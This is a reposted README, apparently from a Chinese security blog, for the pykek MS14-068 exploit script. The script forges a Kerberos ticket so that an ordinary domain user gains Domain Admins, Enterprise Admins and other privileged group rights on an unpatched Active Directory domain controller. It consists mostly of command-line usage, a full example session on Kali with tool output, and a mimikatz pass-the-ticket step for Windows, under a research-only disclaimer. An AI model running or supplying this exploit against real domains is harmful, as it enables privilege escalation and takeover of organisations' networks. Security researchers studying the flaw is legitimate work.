ms14-068.py
Exploits MS14-680 vulnerability on an un-patched domain controler of an Active Directory domain to get a Kerberos ticket for an existing domain user account with the privileges of the following domain groups :
Domain Users (513)
Domain Admins (512)
Schema Admins (518)
Enterprise Admins (519)
Group Policy Creator Owners (520)
USAGE:
ms14-068.py -u@ -s -d OPTIONS: -p --rc4 Example usage : Linux (tested with samba and MIT Kerberos) root@kali:~/sploit/pykek# python ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc Password: [+] Building AS-REQ for dc-a-2003.dom-a.loc... Done! [+] Sending AS-REQ to dc-a-2003.dom-a.loc... Done! [+] Receiving AS-REP from dc-a-2003.dom-a.loc... Done! [+] Parsing AS-REP from dc-a-2003.dom-a.loc... Done! [+] Building TGS-REQ for dc-a-2003.dom-a.loc... Done! [+] Sending TGS-REQ to dc-a-2003.dom-a.loc... Done! [+] Receiving TGS-REP from dc-a-2003.dom-a.loc... Done! [+] Parsing TGS-REP from dc-a-2003.dom-a.loc... Done! [+] Creating ccache file '[email protected]'... Done! root@kali:~/sploit/pykek# mv [email protected] /tmp/krb5cc_0
On Windows
python.exe ms14-068.py -u [email protected] -s S-1-5-21-557603841-771695929-1514560438-1103 -d dc-a-2003.dom-a.loc mimikatz.exe "kerberos::ptc [email protected]" exit`
from: https://github.com/bidord/pykek
留言评论(旧系统):
文章来源于lcx.cc:MS14-068 privilege escalation PoC: 可以让任何域内用户提升为域管理员
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论